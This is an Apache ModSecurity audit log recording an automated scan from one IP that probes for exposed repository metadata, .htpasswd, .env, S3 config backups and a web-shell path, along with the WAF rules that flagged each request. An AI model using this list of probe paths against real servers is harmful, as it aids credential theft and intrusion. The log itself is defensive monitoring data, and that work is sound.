Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/heads/"] [unique_id "aFCrz1JfblPUQiSn5r2RUgAAAAA"] Stopwatch: 1750117327195239 3018 (- - -) Stopwatch2: 1750117327195239 3018; combined=1766, p1=389, p2=1237, p3=22, p4=45, p5=73, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4179882c-Z-- --389a0f30-A-- [17/Jun/2025:05:12:07.308024 +0530] aFCrz9yZ4SMykfn97vy3LAAAAAs 185.177.72.204 60358 127.0.0.1 7080 --389a0f30-B-- GET /.git/refs/heads/main HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --389a0f30-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --389a0f30-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/heads/main"] [unique_id "aFCrz9yZ4SMykfn97vy3LAAAAAs"] Stopwatch: 1750117327305395 2672 (- - -) Stopwatch2: 1750117327305395 2672; combined=1697, p1=406, p2=1191, p3=22, p4=21, p5=57, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --389a0f30-Z-- --004a3952-A-- [17/Jun/2025:05:12:07.418212 +0530] aFCrz5WbMc1Q3J_M-mhIVgAAAAo 185.177.72.204 60372 127.0.0.1 7080 --004a3952-B-- GET /.git/refs/heads/master HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --004a3952-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --004a3952-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/heads/master"] [unique_id "aFCrz5WbMc1Q3J_M-mhIVgAAAAo"] Stopwatch: 1750117327415281 2974 (- - -) Stopwatch2: 1750117327415281 2974; combined=1774, p1=405, p2=1241, p3=24, p4=23, p5=81, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --004a3952-Z-- --83245156-A-- [17/Jun/2025:05:12:07.529211 +0530] aFCrz5VkCcfT-Z8NQYzEoAAAAAc 185.177.72.204 60384 127.0.0.1 7080 --83245156-B-- GET /.git/refs/remotes/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --83245156-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --83245156-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/remotes/"] [unique_id "aFCrz5VkCcfT-Z8NQYzEoAAAAAc"] Stopwatch: 1750117327525562 3693 (- - -) Stopwatch2: 1750117327525562 3693; combined=2486, p1=814, p2=1539, p3=23, p4=47, p5=63, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83245156-Z-- --58a76e52-A-- [17/Jun/2025:05:12:07.638612 +0530] aFCrz9yZ4SMykfn97vy3LQAAAAs 185.177.72.204 60396 127.0.0.1 7080 --58a76e52-B-- GET /.git/refs/remotes/origin/main HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --58a76e52-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --58a76e52-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/remotes/origin/main"] [unique_id "aFCrz9yZ4SMykfn97vy3LQAAAAs"] Stopwatch: 1750117327636357 2300 (- - -) Stopwatch2: 1750117327636357 2300; combined=1465, p1=282, p2=1085, p3=21, p4=29, p5=48, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --58a76e52-Z-- --6dd3186d-A-- [17/Jun/2025:05:12:07.748955 +0530] aFCrz5WbMc1Q3J_M-mhIVwAAAAo 185.177.72.204 60408 127.0.0.1 7080 --6dd3186d-B-- GET /.git/refs/remotes/origin/master HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6dd3186d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dd3186d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/remotes/origin/master"] [unique_id "aFCrz5WbMc1Q3J_M-mhIVwAAAAo"] Stopwatch: 1750117327745944 3053 (- - -) Stopwatch2: 1750117327745944 3053; combined=1816, p1=411, p2=1305, p3=25, p4=25, p5=50, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6dd3186d-Z-- --ef5b5e0c-A-- [17/Jun/2025:05:12:07.859439 +0530] aFCrz5VkCcfT-Z8NQYzEoQAAAAc 185.177.72.204 60416 127.0.0.1 7080 --ef5b5e0c-B-- GET /.git/refs/stash HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ef5b5e0c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef5b5e0c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/stash"] [unique_id "aFCrz5VkCcfT-Z8NQYzEoQAAAAc"] Stopwatch: 1750117327856230 3265 (- - -) Stopwatch2: 1750117327856230 3265; combined=2038, p1=397, p2=1519, p3=26, p4=26, p5=69, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef5b5e0c-Z-- --a64d603c-A-- [17/Jun/2025:05:12:07.969886 +0530] aFCrzwJ4p5Cdblnjra53mQAAAAI 185.177.72.204 60430 127.0.0.1 7080 --a64d603c-B-- GET /.git/refs/tags/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a64d603c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a64d603c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/refs/tags/"] [unique_id "aFCrzwJ4p5Cdblnjra53mQAAAAI"] Stopwatch: 1750117327966993 2938 (- - -) Stopwatch2: 1750117327966993 2938; combined=1883, p1=340, p2=1386, p3=34, p4=70, p5=53, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a64d603c-Z-- --2f49dd50-A-- [17/Jun/2025:05:12:08.090809 +0530] aFCr0JVkCcfT-Z8NQYzEogAAAAc 185.177.72.204 60440 127.0.0.1 7080 --2f49dd50-B-- GET /.git/shell.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2f49dd50-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f49dd50-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/shell.php"] [unique_id "aFCr0JVkCcfT-Z8NQYzEogAAAAc"] Stopwatch: 1750117328087847 3009 (- - -) Stopwatch2: 1750117328087847 3009; combined=1843, p1=415, p2=1353, p3=10, p4=17, p5=48, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2f49dd50-Z-- --46b7357b-A-- [17/Jun/2025:05:12:08.532878 +0530] aFCr0FJfblPUQiSn5r2RVgAAAAA 185.177.72.204 60476 127.0.0.1 7080 --46b7357b-B-- GET /.gitignore HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --46b7357b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b7357b-H-- Message: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.gitignore"] [unique_id "aFCr0FJfblPUQiSn5r2RVgAAAAA"] Stopwatch: 1750117328529554 3380 (- - -) Stopwatch2: 1750117328529554 3380; combined=2086, p1=393, p2=1591, p3=22, p4=27, p5=53, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --46b7357b-Z-- --5111270d-A-- [17/Jun/2025:05:12:08.864721 +0530] aFCr0NyZ4SMykfn97vy3MQAAAAs 185.177.72.204 60504 127.0.0.1 7080 --5111270d-B-- GET /.hg/hgrc HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5111270d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5111270d-H-- Message: Warning. Matched phrase "/.hg/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.hg/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.hg/hgrc"] [unique_id "aFCr0NyZ4SMykfn97vy3MQAAAAs"] Stopwatch: 1750117328861637 3128 (- - -) Stopwatch2: 1750117328861637 3128; combined=1896, p1=412, p2=1374, p3=29, p4=27, p5=54, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5111270d-Z-- --c977906a-A-- [17/Jun/2025:05:12:09.084524 +0530] aFCr0ZVkCcfT-Z8NQYzEpQAAAAc 185.177.72.204 60512 127.0.0.1 7080 --c977906a-B-- GET /.htaccess HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c977906a-F-- HTTP/1.1 403 Forbidden Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1 --c977906a-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.htaccess"] [unique_id "aFCr0ZVkCcfT-Z8NQYzEpQAAAAc"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/default/htdocs/.htaccess Stopwatch: 1750117329083344 1239 (- - -) Stopwatch2: 1750117329083344 1239; combined=735, p1=528, p2=0, p3=44, p4=42, p5=121, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c977906a-Z-- --9078730d-A-- [17/Jun/2025:05:12:09.192632 +0530] aFCr0dyZ4SMykfn97vy3MgAAAAs 185.177.72.204 60524 127.0.0.1 7080 --9078730d-B-- GET /.htpasswd HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9078730d-F-- HTTP/1.1 403 Forbidden Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1 --9078730d-H-- Message: Warning. Matched phrase ".htpasswd" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.htpasswd"] [unique_id "aFCr0dyZ4SMykfn97vy3MgAAAAs"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/default/htdocs/.htpasswd Stopwatch: 1750117329191712 964 (- - -) Stopwatch2: 1750117329191712 964; combined=581, p1=406, p2=0, p3=55, p4=33, p5=87, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9078730d-Z-- --d0abd407-A-- [17/Jun/2025:05:12:10.328694 +0530] aFCr0pWbMc1Q3J_M-mhIXQAAAAo 185.177.72.204 42574 127.0.0.1 7080 --d0abd407-B-- GET /.s3cfg.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d0abd407-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0abd407-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".s3cfg.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".s3cfg.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.s3cfg.bak"] [unique_id "aFCr0pWbMc1Q3J_M-mhIXQAAAAo"] Stopwatch: 1750117330325720 3018 (- - -) Stopwatch2: 1750117330325720 3018; combined=1909, p1=299, p2=1515, p3=18, p4=24, p5=53, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d0abd407-Z-- --e30ca365-A-- [17/Jun/2025:05:12:10.438963 +0530] aFCr0gGFf516NUzzD0B3FwAAAAg 185.177.72.204 42576 127.0.0.1 7080 --e30ca365-B-- GET /.s3cfg.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e30ca365-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e30ca365-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".s3cfg.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".s3cfg.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.s3cfg.old"] [unique_id "aFCr0gGFf516NUzzD0B3FwAAAAg"] Stopwatch: 1750117330436040 2966 (- - -) Stopwatch2: 1750117330436040 2966; combined=1787, p1=355, p2=1328, p3=18, p4=23, p5=63, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e30ca365-Z-- --d6b20365-A-- [17/Jun/2025:05:12:10.990989 +0530] aFCr0tyZ4SMykfn97vy3NwAAAAs 185.177.72.204 42622 127.0.0.1 7080 --d6b20365-B-- GET /.svn/entries HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d6b20365-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6b20365-H-- Message: Warning. Matched phrase "/.svn/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.svn/entries"] [unique_id "aFCr0tyZ4SMykfn97vy3NwAAAAs"] Stopwatch: 1750117330987373 3676 (- - -) Stopwatch2: 1750117330987373 3676; combined=2175, p1=462, p2=1582, p3=30, p4=31, p5=70, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d6b20365-Z-- --d700b812-A-- [17/Jun/2025:05:12:11.210985 +0530] aFCr05VkCcfT-Z8NQYzEqwAAAAc 185.177.72.204 42638 127.0.0.1 7080 --d700b812-B-- GET /.vscode/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d700b812-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d700b812-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.vscode/.env"] [unique_id "aFCr05VkCcfT-Z8NQYzEqwAAAAc"] Stopwatch: 1750117331208272 2757 (- - -) Stopwatch2: 1750117331208272 2757; combined=1669, p1=374, p2=1197, p3=19, p4=24, p5=55, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d700b812-Z-- --e566d272-A-- [17/Jun/2025:05:12:15.621760 +0530] aFCr1wrsPejRtmHkrKLgRgAAAAE 185.177.72.204 43004 127.0.0.1 7080 --e566d272-B-- GET /access.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e566d272-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e566d272-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/access.log"] [unique_id "aFCr1wrsPejRtmHkrKLgRgAAAAE"] Stopwatch: 1750117335618836 2976 (- - -) Stopwatch2: 1750117335618836 2976; combined=1786, p1=355, p2=1339, p3=18, p4=22, p5=52, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e566d272-Z-- 